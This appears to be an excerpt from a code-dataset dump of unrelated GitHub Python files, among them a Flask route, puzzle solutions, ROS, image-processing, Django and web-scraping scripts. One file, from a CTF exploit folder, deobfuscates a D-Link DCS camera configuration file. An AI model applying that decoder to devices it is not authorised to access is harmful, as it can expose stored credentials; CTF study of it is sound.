query.first_or_404()\n\n # format the query into a dictionnary first:\n\t\n result = {}\n arr_id = block.get_id().replace(' ',' ').split(' ')\n result['id'] = arr_id[0]\n \n arr_task_id = block.get_task_id().replace(' ',' ').split(' ')\n result['taskID'] = arr_task_id[0]\n \n arr_user_no = block.get_user_no().replace(' ',' ').split(' ')\n result['userNo'] = arr_user_no[0]\n \n arr_item_no = block.get_item_no().replace(' ',' ').split(' ')\n result['itemNo'] = arr_item_no[0]\n \n arr_horizon = block.get_horizon().replace(' ',' ').split(' ')\n result['horizon'] = arr_horizon[0]\n \n arr_block_no = block.get_block_no().replace(' ',' ').split(' ')\n result['blockNo'] = arr_block_no[0]\n \n arr_trial_no = block.get_trial_no().replace(' ',' ').split(' ')\n result['trialNo'] = arr_trial_no[0]\n \n arr_sample_nb = block.get_sample_nb().replace(' ',' ').split(' ')\n result['sampleNb'] = arr_sample_nb[0]\n\n\n app.logger.info(result)\n return jsonify(result), 200 ","repo_name":"MagDub/MFweb-api","sub_path":"routes/old/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42310583680","text":"from sklearn.model_selection import KFold\nimport Parser\nfrom itertools import product\nimport numpy as np\n\n\nclass WwmAnalysis:\n def __init__(self):\n self.parsers = list()\n self.correct_list = list()\n self.number_of_words_in_fold = list()\n self.accuracies = list()\n self.compare = set()\n\n def run_analysis(self, params=None, folds=6):\n with open(\"../list-files/bnc_word_list.txt\", \"r\") as f:\n self.compare = set(f.readlines())\n\n p = Parser.Parser(\"../list-files/MobyDickList.txt\")\n\n lex = p.lexicon\n np_lex = np.array(lex)\n\n k_fold = KFold(folds, True)\n\n bnc_tagset = [\"AJ0\", \"AJC\", \"AJS\", \"NN1\", \"NN2\", \"VVB\", \"VVD\", \"VVG\", \"VVI\", \"VVN\", \"VVZ\"]\n upenn_tagset = [\"JJ\", \"JJR\", \"JJS\", \"NN\", \"NNS\", \"VB\", \"VBD\", \"VBG\", \"VBP\", \"VBN\", \"VBZ\"]\n upenn_to_bnc = {k: v for k, v in zip(upenn_tagset, bnc_tagset)}\n\n self.parsers = list()\n self.correct_list = list()\n self.number_of_words_in_fold = list()\n self.accuracies = list()\n\n for check, test in k_fold.split(np_lex):\n p = Parser.Parser()\n p.lexicon = [(x, y) for x, y in np_lex[test]]\n\n self.number_of_words_in_fold.append(len(p.lexicon))\n p.params.update(params)\n\n p.wwm()\n\n correct = list()\n count_total = len(lex)\n\n for word in p.generated_new_words:\n if \"{},{}\\n\".format(word[0], upenn_to_bnc[word[1]]) in self.compare:\n correct.append(word)\n\n self.parsers.append(p)\n self.correct_list.append(correct)\n\n def print_stats(self):\n for i in range(len(self.parsers)):\n print(\"number of words in fold: \" + str(self.number_of_words_in_fold[i]))\n print(\"number of strategies discovered: \" + str(len(self.parsers[i].strategies)))\n print(\"number of new words: \" + str(len(self.parsers[i].generated_new_words)))\n print(\"number of correct words: \" + str(len(self.correct_list[i])))\n print(\"number of total comparison words: \" + str(len(self.compare)))\n if len(self.parsers[i].generated_new_words) != 0:\n acc = len(self.correct_list[i]) / len(self.parsers[i].generated_new_words)\n else:\n acc = 0\n print(\"accuracy: \" + str(acc))\n\n def get_accuracies(self):\n self.accuracies = list()\n for i in range(len(self.parsers)):\n if len(self.parsers[i].generated_new_words) != 0:\n acc = len(self.correct_list[i]) / len(self.parsers[i].generated_new_words)\n else:\n acc = 0\n self.accuracies.append(acc)\n return self.accuracies\n\n def get_avg_accuracy(self):\n accs = self.get_accuracies()\n return sum(accs)/len(accs)\n\n def get_avg_strategy_count(self):\n strat_counts = list()\n for p in self.parsers:\n strat_counts.append(len(p.strategies))\n return sum(strat_counts) / len(strat_counts)\n\n def find_parameters(self):\n begin_sequence_overlap = list(range(2, 3))\n end_sequence_overlap = list(range(3,4))\n comparison_threshold = list(range(15, 18, 1))\n editdistance_threshold = list(range(4, 5))\n\n params_possible_values = [begin_sequence_overlap, end_sequence_overlap,\n comparison_threshold, editdistance_threshold]\n\n param_names = [\"begin_sequence_overlap\", \"end_sequence_overlap\", \"comparison_threshold\", \"editdistance_threshold\"]\n\n param_list = [list(zip(param_names, p)) for p in list(product(*params_possible_values))]\n\n data = list()\n print(len(param_list))\n\n for params in [{k: v for k,v in param_vals} for param_vals in param_list]:\n print(\"====================================================\")\n print(params)\n an = WwmAnalysis()\n an.run_analysis(params)\n\n print(\"accuracies list: \" + str(an.get_accuracies()))\n print(\"avg accuracy: \" + str(an.get_avg_accuracy()))\n print(\"avg strategy count: \" + str(an.get_avg_strategy_count()))\n\n data.append((params, an.get_accuracies(), an.get_avg_accuracy(), an.get_avg_strategy_count()))\n\n with open(\"analysis_data_3.txt\", \"w\", encoding=\"utf-8\") as f:\n for d in data:\n f.write(\"{}\\t{}\\t{}\\t{}\\n\".format(d[2], d[3], d[1], d[0]))\n\n\nif __name__ == \"__main__\":\n params = {\n \"begin_sequence_overlap\": 2,\n \"end_sequence_overlap\": 3,\n \"comparison_threshold\": 48,\n \"editdistance_threshold\": 4\n }\n\n analysis = WwmAnalysis()\n analysis.run_analysis(params=params, folds=2)\n\n analysis.print_stats()\n\n print(str(analysis.get_avg_accuracy()))\n\n # analysis.find_parameters()\n\n","repo_name":"maugl/wwm","sub_path":"analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10184099360","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/9/18 下午10:26\n# @Author : jaelyn\n# @FileName: 821.py\n# @Software: PyCharm\n\nclass Solution(object):\n def shortestToChar(self, S, C):\n \"\"\"\n :type S: str\n :type C: str\n :rtype: List[int]\n \"\"\"\n ans_list = []\n for i in range(len(S)):\n left, right = S[i - len(S)::-1].find(C), S[i:].find(C)\n if left == -1:\n left = 10000\n if right == -1:\n right = 10000\n ans_list.append(min(left, right))\n return ans_list\n # ans_list = []\n # for index, s_c in enumerate(S.split(C)):\n # if index == 0:\n # for i in range(len(s_c)):\n # ans_list.append((len(s_c)-i))\n # elif index == len(s_c)-1:\n # pass\n # else:\n # for i in range(len(s_c)//2):\n # ans_list.append(i+1)\n # if len(s_c) % 2 != 0:\n # ans_list.append(len(s_c)//2+1)\n # for i in range(len(s_c)//2):\n # ans_list.append((len(s_c)//2)-i)\n # ans_list.append(0)\n # print(index, s_c)\n # ans_list.pop()\n # return ans_list\n\n\nif __name__ == '__main__':\n solution = Solution()\n S = \"abaa\"\n C = 'b'\n ret = solution.shortestToChar(S, C)\n print(ret)","repo_name":"Jaelyn-Lim/leetcode","sub_path":"2018-9/821.py","file_name":"821.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29235521197","text":"\ndef is_prime(n, primes):\n for p in primes:\n if n % p == 0:\n return False\n return True\n\ni = 2\nprimes = []\nwhile True:\n if len(primes) >= 10001:\n break\n if is_prime(i, primes):\n primes.append(i)\n i += 1\nprint(primes[10000])\n","repo_name":"maxtrussell/project-euler","sub_path":"problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28700980604","text":"# 'data' holds the content of the obfuscated configuration file\nimport sys\ndef deobfuscate(data):\n r = []\n for c in data:\n c = ord(c)\n c = (c + ord('y')) & 0xff\n c = (c ^ ord('Z')) & 0xff\n c = (c - ord('e')) & 0xff\n r.append(c)\n\n tmp = None\n i = len(r) - 1\n while i >= 0:\n if i == len(r) - 1:\n x = r[i]\n tmp = ((x & 7) << 5) & 0xff\n\n if i == 0:\n assert tmp is not None\n x = r[0]\n x = (x >> 3) & 0xff\n x = (x + tmp) & 0xff\n r[0] = x\n else:\n c1 = r[i-1]\n c2 = r[i]\n c1 = c1 & 0x7\n c2 = (c2 >> 3) & 0xff\n c1 = (c1 << 5) & 0xff\n c2 = (c2 + c1) & 0xff\n r[i] = c2\n i = i - 1\n\n r = \"\".join([chr(x) for x in r])\n\n s = \"\"\n assert (len(r) % 2) == 0\n for i in range(len(r)/2):\n s += r[i+(len(r)/2)] + r[i]\n \n return s\n\n\ndef main():\n data = sys.stdin.read()\n s = deobfuscate(data)\n sys.stdout.write(s)\n\nmain()\n\n","repo_name":"cyberxml/iot-resources","sub_path":"ctf/dlink-dcs930l/exploit/dcs901l-edb24442.py","file_name":"dcs901l-edb24442.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40246156697","text":"#!/usr/bin/env python\n\n#This hasn't been added to index.html\nimport rospy\nimport dynamic_reconfigure.client\nfrom std_msgs.msg import Empty\n\nclass Laser(object):\n def __init__(self):\n self.client = dynamic_reconfigure.client.Client('camera_synchronizer_node')\n\n def laser_ON(self, msg):\n \tparams = { 'narrow_stereo_trig_mode' : 3 }\n \tself.client.update_configuration(params)\n\n def laser_OFF(self, msg):\n \tparams2 = { 'narrow_stereo_trig_mode' : 4 }\n \tself.client.update_configuration(params2)\n \n\ndef main():\n\trospy.init_node('laser_node')\n\tlaser = Laser()\n\trospy.Subscriber('laser_ON', Empty, laser.laser_ON)\n\trospy.Subscriber('laser_OFF', Empty, laser.laser_OFF)\n\trospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hcrlab/rws_simple_action_interface","sub_path":"scripts/laser_node.py","file_name":"laser_node.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28849794155","text":"from __future__ import print_function\nfrom builtins import input\nfrom skimage.io import imread, imshow\nimport cv2\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\n\nimage=cv2.imread(\"../img/5.jpg\")\nimage=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\nnew_image = np.zeros(image.shape, image.dtype)\nalpha = 1.0 # Simple contrast control\nbeta = 0 # Simple brightness control\n\nprint(' Basic Linear Transforms ')\nprint('-------------------------')\ntry:\n alpha = float(input('* Enter the alpha value [1.0-3.0]: '))\n beta = int(input('* Enter the beta value [0-100]: '))\nexcept ValueError:\n print('Error, not a number')\n\n\n\nfor y in range(image.shape[0]):\n for x in range(image.shape[1]):\n for c in range(image.shape[2]):\n new_image[y,x,c] = np.clip(alpha*image[y,x,c] + beta, 0, 255)\n\n\n\nplt.subplot(211),imshow(image)\nplt.title('Original Image')\nplt.subplot(212),imshow(new_image)\nplt.title('new Image')\nplt.show()\n","repo_name":"mohitrawat9885/Machine-Learning-Image-Video-Processing-","sub_path":"Image_Enhance/brightness_contrast.py","file_name":"brightness_contrast.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28222604391","text":"# tf_unet is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# tf_unet is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with tf_unet. If not, see <http://www.gnu.org/licenses/>.\r\n\r\n'''\r\nauthor: jakeret\r\n'''\r\nfrom __future__ import print_function, division, absolute_import, unicode_literals\r\n\r\nimport glob\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport cv2\r\n\r\nclass BaseDataProvider(object):\r\n \"\"\"\r\n Abstract base class for DataProvider implementation. Subclasses have to\r\n overwrite the `_next_data` method that load the next data and label array.\r\n This implementation automatically clips the data with the given min/max and\r\n normalizes the values to (0,1]. To change this behavoir the `_process_data`\r\n method can be overwritten. To enable some post processing such as data\r\n augmentation the `_post_process` method can be overwritten.\r\n\r\n :param a_min: (optional) min value used for clipping\r\n :param a_max: (optional) max value used for clipping\r\n\r\n \"\"\"\r\n \r\n channels = 1\r\n n_class = 2\r\n \r\n\r\n def __init__(self, a_min=None, a_max=None):\r\n self.a_min = a_min if a_min is not None else -np.inf\r\n self.a_max = a_max if a_min is not None else np.inf\r\n\r\n def _load_data_and_label(self):\r\n data, label = self._next_data()\r\n \r\n train_data = self._process_data(data)\r\n labels = self._process_labels(label)\r\n \r\n train_data, labels = self._post_process(train_data, labels)\r\n \r\n nx = train_data.shape[1]\r\n ny = train_data.shape[0]\r\n\r\n return train_data.reshape(1, ny, nx, self.channels), labels.reshape(1, ny, nx, self.n_class),\r\n \r\n def _process_labels(self, label):\r\n\r\n if self.n_class == 2:\r\n nx = label.shape[1]\r\n ny = label.shape[0]\r\n labels = np.zeros((ny, nx, self.n_class), dtype=np.float32)\r\n labels[..., 1] = label\r\n labels[..., 0] = ~label\r\n return labels\r\n\r\n return label\r\n \r\n def _process_data(self, data):\r\n # normalization\r\n data = np.clip(np.fabs(data), self.a_min, self.a_max)\r\n data -= np.amin(data)\r\n data /= np.amax(data)\r\n if np.amax(data) != 0:\r\n data /= np.amax(data)\r\n return data\r\n \r\n def _post_process(self, data, labels):\r\n \"\"\"\r\n Post processing hook that can be used for data augmentation\r\n \r\n :param data: the data array\r\n :param labels: the label array\r\n \"\"\"\r\n\r\n row, col = data.shape[:2]\r\n bottom = data[row - 2:row, 0:col]\r\n mean = cv2.mean(bottom)[0]\r\n\r\n bordersize = 25\r\n data_with_border = cv2.copyMakeBorder(data, top=bordersize, bottom=bordersize, left=bordersize, right=bordersize, borderType=cv2.BORDER_CONSTANT, value=[0, 0, 0])\r\n\r\n #\r\n #\r\n # row, col = labels.shape[:2]\r\n # bottom = labels[row - 2:row, 0:col]\r\n # mean = cv2.mean(bottom)[0]\r\n #\r\n # labels_with_border = cv2.copyMakeBorder(data, top=bordersize, bottom=bordersize, left=bordersize, right=bordersize, borderType=cv2.BORDER_CONSTANT, value=[mean])\r\n\r\n\r\n\r\n # shape = data.shape\r\n # w = shape[1]\r\n # h = shape[0]\r\n #\r\n # base_size = h + 30, w + 30, 3\r\n # # make a 3 channel image for base which is slightly larger than target img\r\n # base = np.zeros(base_size, dtype=np.uint8)\r\n # cv2.rectangle(base, (0, 0), (w + 30, h + 30), (255, 255, 255), 30) # really thick white rectangle\r\n # base[10:h + 10, 10:w + 10] = data\r\n\r\n\r\n # shape = labels.shape\r\n # w = shape[1]\r\n # h = shape[0]\r\n #\r\n # base_size = h + 30, w + 30, 2\r\n # # make a 3 channel image for base which is slightly larger than target img\r\n # base = np.zeros(base_size, dtype=np.uint8)\r\n # cv2.rectangle(base, (0, 0), (w + 30, h + 30), (255, 255, 255), 30) # really thick white rectangle\r\n # base[10:h + 10, 10:w + 10] = labels\r\n\r\n return data, labels\r\n \r\n def __call__(self, n):\r\n train_data, labels = self._load_data_and_label()\r\n nx = train_data.shape[1]\r\n ny = train_data.shape[2]\r\n \r\n X = np.zeros((n, nx, ny, self.channels))\r\n Y = np.zeros((n, nx, ny, self.n_class))\r\n \r\n X[0] = train_data\r\n Y[0] = labels\r\n for i in range(1, n):\r\n train_data, labels = self._load_data_and_label()\r\n X[i] = train_data\r\n Y[i] = labels\r\n \r\n return X, Y\r\n \r\nclass SimpleDataProvider(BaseDataProvider):\r\n \"\"\"\r\n A simple data provider for numpy arrays. \r\n Assumes that the data and label are numpy array with the dimensions\r\n data `[n, X, Y, channels]`, label `[n, X, Y, classes]`. Where\r\n `n` is the number of images, `X`, `Y` the size of the image.\r\n\r\n :param data: data numpy array. Shape=[n, X, Y, channels]\r\n :param label: label numpy array. Shape=[n, X, Y, classes]\r\n :param a_min: (optional) min value used for clipping\r\n :param a_max: (optional) max value used for clipping\r\n :param channels: (optional) number of channels, default=1\r\n :param n_class: (optional) number of classes, default=2\r\n \r\n \"\"\"\r\n \r\n def __init__(self, data, label, a_min=None, a_max=None, channels=1, n_class=2):\r\n super(SimpleDataProvider, self).__init__(a_min, a_max)\r\n self.data = data\r\n self.label = label\r\n self.file_count = data.shape[0]\r\n self.n_class = n_class\r\n self.channels = channels\r\n\r\n def _next_data(self):\r\n idx = np.random.choice(self.file_count)\r\n return self.data[idx], self.label[idx]\r\n\r\n\r\nclass ImageDataProvider(BaseDataProvider):\r\n \"\"\"\r\n Generic data provider for images, supports gray scale and colored images.\r\n Assumes that the data images and label images are stored in the same folder\r\n and that the labels have a different file suffix \r\n e.g. 'train/fish_1.tif' and 'train/fish_1_mask.tif'\r\n\r\n Usage:\r\n data_provider = ImageDataProvider(\"..fishes/train/*.tif\")\r\n \r\n :param search_path: a glob search pattern to find all data and label images\r\n :param a_min: (optional) min value used for clipping\r\n :param a_max: (optional) max value used for clipping\r\n :param data_suffix: suffix pattern for the data images. Default '.tif'\r\n :param mask_suffix: suffix pattern for the label images. Default '_mask.tif'\r\n :param shuffle_data: if the order of the loaded file path should be randomized. Default 'True'\r\n :param channels: (optional) number of channels, default=1\r\n :param n_class: (optional) number of classes, default=2\r\n \r\n \"\"\"\r\n \r\n def __init__(self, search_path, a_min=None, a_max=None, data_suffix=\".jpg\", mask_suffix='_mask.tif', shuffle_data=True, n_class=2):\r\n super(ImageDataProvider, self).__init__(a_min, a_max)\r\n self.data_suffix = data_suffix\r\n self.mask_suffix = mask_suffix\r\n self.file_idx = -1\r\n self.shuffle_data = shuffle_data\r\n self.n_class = n_class\r\n \r\n self.data_files = self._find_data_files(search_path)\r\n \r\n if self.shuffle_data:\r\n np.random.shuffle(self.data_files)\r\n\r\n try:\r\n assert len(self.data_files) > 0, \"No training files\"\r\n except Exception:\r\n print('Dang!')\r\n print(\"Number of files used: %s\" % len(self.data_files))\r\n \r\n img = self._load_file(self.data_files[0])\r\n self.channels = 1 if len(img.shape) == 2 else img.shape[-1]\r\n \r\n def _find_data_files(self, search_path):\r\n all_files = glob.glob(search_path + r'\\*', recursive=True)\r\n all_files = [i for i in all_files if r'.xml' not in i]\r\n all_files = [i for i in all_files if r'.ovr' not in i]\r\n all_files = [i for i in all_files if r'.jgw' not in i]\r\n # return [name for name in all_files if self.data_suffix in name and self.mask_suffix not in name]\r\n\r\n exclusions = ['BX24_500_013026', 'BX24_500_013027', 'BX24_500_013028', 'BX24_500_013034', 'BX24_500_013035', 'BX24_500_014028', 'BX24_500_014029', 'BX24_500_014030',\r\n 'BX24_500_013026_mask', 'BX24_500_013027_mask', 'BX24_500_013028_mask', 'BX24_500_013034_mask', 'BX24_500_013035_mask', 'BX24_500_014028_mask', 'BX24_500_014029_mask',\r\n 'BX24_500_014030_mask']\r\n\r\n all_files_with_exclusions = [i for i in all_files if i.split('.')[0].split('\\\\')[-1] not in exclusions]\r\n return all_files_with_exclusions ## COMPLETE EXCLUSIONS\r\n \r\n def _load_file(self, path, dtype=np.float32, format='image_file'):\r\n if format == 'image_file':\r\n images = cv2.imread(path)\r\n images_scaled = cv2.resize(images, (400, 600))\r\n return np.array(images_scaled, dtype)\r\n elif format == 'GeoTiff':\r\n mask = np.squeeze(cv2.imread(path, cv2.IMREAD_GRAYSCALE))\r\n mask_scaled = cv2.resize(mask, (400, 600))\r\n return np.array(mask_scaled, np.bool)\r\n\r\n def _cycle_file(self):\r\n self.file_idx += 1\r\n if self.file_idx >= len(sorted([i for i in self.data_files if i.split('.')[1] == self.data_suffix.split('.')[1]])):\r\n self.file_idx = 0 \r\n if self.shuffle_data:\r\n np.random.shuffle(self.data_files)\r\n \r\n def _next_data(self):\r\n self._cycle_file()\r\n\r\n image_name = sorted([i for i in self.data_files if i.split('.')[1] == self.data_suffix.split('.')[1]])[self.file_idx]\r\n\r\n try:\r\n label_name = sorted([i for i in self.data_files if i.split('.')[1] == self.mask_suffix.split('.')[1]])[self.file_idx]\r\n except IndexError:\r\n print('Index Out of Range')\r\n label_name = None\r\n\r\n img = self._load_file(image_name, np.float32, 'image_file')\r\n if label_name not in self.data_files:\r\n # label = np.array(np.random.rand(400, 600), np.bool)\r\n label = np.empty(shape=(400, 600), dtype=np.bool)\r\n\r\n\r\n else:\r\n label = self._load_file(label_name, np.bool, 'GeoTiff')\r\n return img, label\r\n","repo_name":"NumbaCruncha/RoadDetection","sub_path":"tf_unet/image_util.py","file_name":"image_util.py","file_ext":"py","file_size_in_byte":10644,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"15126632728","text":"\"\"\"OTAI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom myapp.views import *\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url('^$', nameOfHomepage, name=\"homepage\"), # HomePage front end url\n url('^contact-us', nameOfContactUs, name=\"contact_us\"), # Contact Us url\n url('^pricing', nameOfPricing, name=\"pricing\"), # Pricing url\n url('^sign-up/$', nameOfSignUp, name=\"sign-up\"), # SignUpPage url\n url(r'^activation/$', nameOfActivation, name='activation'), # Activation url\n url('^login/$', nameOfLogin, name=\"login\"), # Login url\n url('^home', nameOfHomePage, name=\"home\"), # Admin Home page backend\n url('^logout', nameOfLogout, name=\"logout\"), #Logout\n\n]\n","repo_name":"anithahosamani/DjangoMongoDB","sub_path":"OTAI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9124018710","text":"from typing import List\n\nclass Solution:\n def findLengthOfLCIS(self, nums: List[int]) -> int:\n if len(nums) <= 1:\n return len(nums)\n curLength = 1\n maxLength = 1\n for i in range(1, len(nums)):\n if nums[i-1] < nums[i]:\n # print(nums[i], \"is greater than\", nums[i-1])\n curLength += 1\n # print(\"curLength:\", curLength)\n else:\n curLength = 1\n maxLength = max(curLength, maxLength)\n # print(\"maxLength:\", maxLength)\n return maxLength\n\n\n# test driver\nsol = Solution()\narr = [1,3,5,4,7]\nprint(\"Input:\", arr)\nprint(\"Output:\", sol.findLengthOfLCIS(arr))","repo_name":"minhyeong-joe/leetcode-challenge","sub_path":"DynamicProgramming/LongestIncreasingSubsequence/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74337148961","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 22 00:04:10 2022\n\n@author: ilirsheraj\n\"\"\"\n# In this module we will write a bad hashing function just to understand the concept\n\ndata = [\n (\"orange\", \"a sweet, orange, citrus fruit\"),\n (\"apple\", \"good for making cider\"),\n (\"lemon\", \"a sour, yellow citrus fruit\"),\n (\"grape\", \"a small, sweet fruit growing in branches\"),\n (\"melon\", \"sweet and juicy\"),\n ]\n\n# # To get an integer from each letter using ord() built-in function\n# # Every character is represented by a unique number\n# print(ord(\"a\"))\n# print(ord(\"b\"))\n# print(ord(\"z\"))\n\n# # Let's run the hashing function\ndef simple_hash(s: str) -> int:\n \"\"\"\n A ridiculously simple hashing function\n \"\"\"\n basic_hash = ord(s[0])\n return basic_hash % 10\n\n\n# for key, value in data:\n# h = simple_hash(key)\n# print(key, h)\n\n\n# # Let's call the python built-in hash function and see whats happesn\n# for key, value in data:\n# h = hash(key)\n# print(key, h)\n\n\n\ndef get(k: str) -> str:\n \"\"\"\n Return the value of a key, or None if the key does not exist\n \"\"\"\n hash_code = simple_hash(k)\n if values[hash_code]:\n return values[hash_code]\n else:\n return None\n\n\n# We will create two lists\nkeys = [\"\"] *10\nvalues = keys.copy() \n \nfor key, value in data:\n h = simple_hash(key)\n # h = hash(key)\n print(key,h)\n keys[h] = key\n values[h] = value\n \nprint(keys)\nprint(values)\nprint()\n\nvalue = get(\"lemon\")\nprint(value)\nprint()\nprint(get(\"grape\"))\nprint()\nprint(get(\"tomato\"))\nprint()\nprint(get(\"bannana\"))","repo_name":"ilirsheraj/PythonMasterClass","sub_path":"DictSet/atrocious_hash.py","file_name":"atrocious_hash.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25591082425","text":"# import modules-----------\nimport urllib\nimport bs4\n\n# open and get site------------------\n\n# get url\nurl = input(\"Please input azlyrics from which to scrape: \")\n# getting site\ntry:\n contentSite = urllib.request.urlopen(url) #get site\nexcept urllib.error.HTTPError as urlHttpErr:\n print(\"Error retrieving page! Error Code: \" + str(urlHttpErr))\nexcept urllib.error.URLError as urlErr:\n print(\"Ran into a problem while retrieving page! Error Code: \" +\n str(urlErr))\nexcept:\n print(\"Error!\")\n# parse site\ncontentSoup = bs4.BeautifulSoup(contentSite, \"html.parser\")\n\n# scrape lyrics------------------\n\n# Lyrics in div element without class\ncontentLyrics = contentSoup.find_all(\"div\", attrs = {\"class\":None})\n\n# extract text from lyrics=============\nunformattedLyrics = []\nfor i in contentLyrics[1]:\n if \"<\" or \">\" not in i:\n unformattedLyrics.append(i)\n elif \"<\" or \">\" in i:\n continue\n\n# removing the <br/> from the end of the lyrics=============\nfor i in range(len(unformattedLyrics)):\n if \"<br/>\" in unformattedLyrics[i]:\n unformattedLyrics[i] = unformattedLyrics[i].replace(\"<br/>\", \"\")\n else:\n continue\n# removing the first line (disclaimer) from the lyrics\nunformattedLyrics = unformattedLyrics[2:]\n\n# removing the '<br/>' occurences from the file=============\nfinalLyrics = [i if not isinstance(i, bs4.element.Tag) else \"\" for i in unformattedLyrics]\n\n# writing lyrics to a file------------\n\n# get file name from user\nfileName = input(\"To what file would like to the write the lyrics to? \")\ntry:\n with open(fileName + \".txt\", \"w\") as lyricsFile:\n for i in finalLyrics:\n print(i, file = lyricsFile)\nexcept IOError as ioerr:\n print(\"Error opening file: \" + str(ioerr))\n","repo_name":"krishnamurthypranesh/AzlyricsScraper","sub_path":"scrapeLyrics.py","file_name":"scrapeLyrics.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26205698883","text":"from pygame import mixer # Load the required library\nimport os\n\nTrek_sounds = {'open_image': 'tos_com_beep_3.mp3',\n 'classAnalysis': 'hail_allship_ep.mp3',\n 'material_identification': 'romulan_transporter.mp3',\n 'other': 'hail_allship_ep.mp3'}\n\nsound_classes = {'Trek': Trek_sounds}\n\ndef play(sound_class, sound_type):\n\n # retrun if no sound class is passed\n if sound_class == None:\n return\n\n sounds = sound_classes[sound_class]\n if sound_type in sounds.keys():\n sound = sounds[sound_type]\n else:\n sound = sounds['other']\n\n mixer.init()\n mixer.music.load(os.path.join(os.getcwd(), sound))\n mixer.music.play()\n\n","repo_name":"wbasener/hyperspectralpy","sub_path":"spectralAdv/easterEggSounds.py","file_name":"easterEggSounds.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"12163761822","text":"import sys\nfrom pprint import pprint\nimport re\nimport datetime\nfrom multiprocessing import Pool\nfrom itertools import cycle, chain\n\nfrom bs4 import BeautifulSoup\nfrom pyvirtualdisplay import Display\n\nimport logger\nfrom selenium_driver import SeleniumDriver\nfrom sleep import scrapping_sleep\nfrom lists_methods import merge_list_of_lists, slice_list\nfrom string_to_number import string_to_number\nfrom database import db_connect\n\nfrom platform_config import PLATFORM\nfrom proxies import AUTO_RU_SCRAPPER_PROXIES\nfrom common_config import LOGFILE_PATH, START_YEAR, SCRAPPING_SOURCES, AUTO_RU_REGIONS_ALIASES, SEARCH_PARAMS, SELENIUM_WIRE_OPTIONS, AUTO_RU_ERROR_PAGE_URL, AUTO_RU_COOKIES, OFFERS_SCRAPPER_PROCESSES_COUNT\n\nlogger = logger.get_logger(__name__, LOGFILE_PATH)\nstart_time = datetime.datetime.now()\nprocesses_count = OFFERS_SCRAPPER_PROCESSES_COUNT\n\n\ndef scrape_offers(region='Санкт-Петербург'):\n \"\"\"Scrapping offers from a listing.\n\n Args:\n region (string, optional): The region to parse data. Defaults to \"Санкт-Петербург\"\n \"\"\"\n\n parsing_options = prepare_base_page_parsing_options()\n\n options = list(map(lambda x: {\n 'wire_options': x['wire_options'],\n 'region': region,\n 'years': x['years']\n }, parsing_options))\n\n if PLATFORM == 'linux64':\n display = Display()\n display.start()\n\n with Pool(processes=processes_count) as pool:\n results = pool.map(get_base_pages_data, options)\n pool.close()\n pool.join()\n\n page_sources = get_pages_sources(results)\n\n offers_data = []\n\n for source_code in page_sources:\n page_offers_data = get_offers_data(source_code, region)\n\n if len(page_offers_data) == 0:\n logger.warning('Отсутствуют предложения для страницы.')\n continue\n\n offers_data = offers_data + page_offers_data\n\n logger.warning(\n f'Всего предложений: {len(offers_data)} шт.')\n\n offers_data = filter_existing_offers(offers_data)\n add_offers_to_db(offers_data)\n\n logger.warning(\n f'Время выполнения скрипта: {datetime.datetime.now() - start_time}')\n\n if 'display' in locals():\n display.stop()\n\n\ndef get_pages_sources(data_list):\n 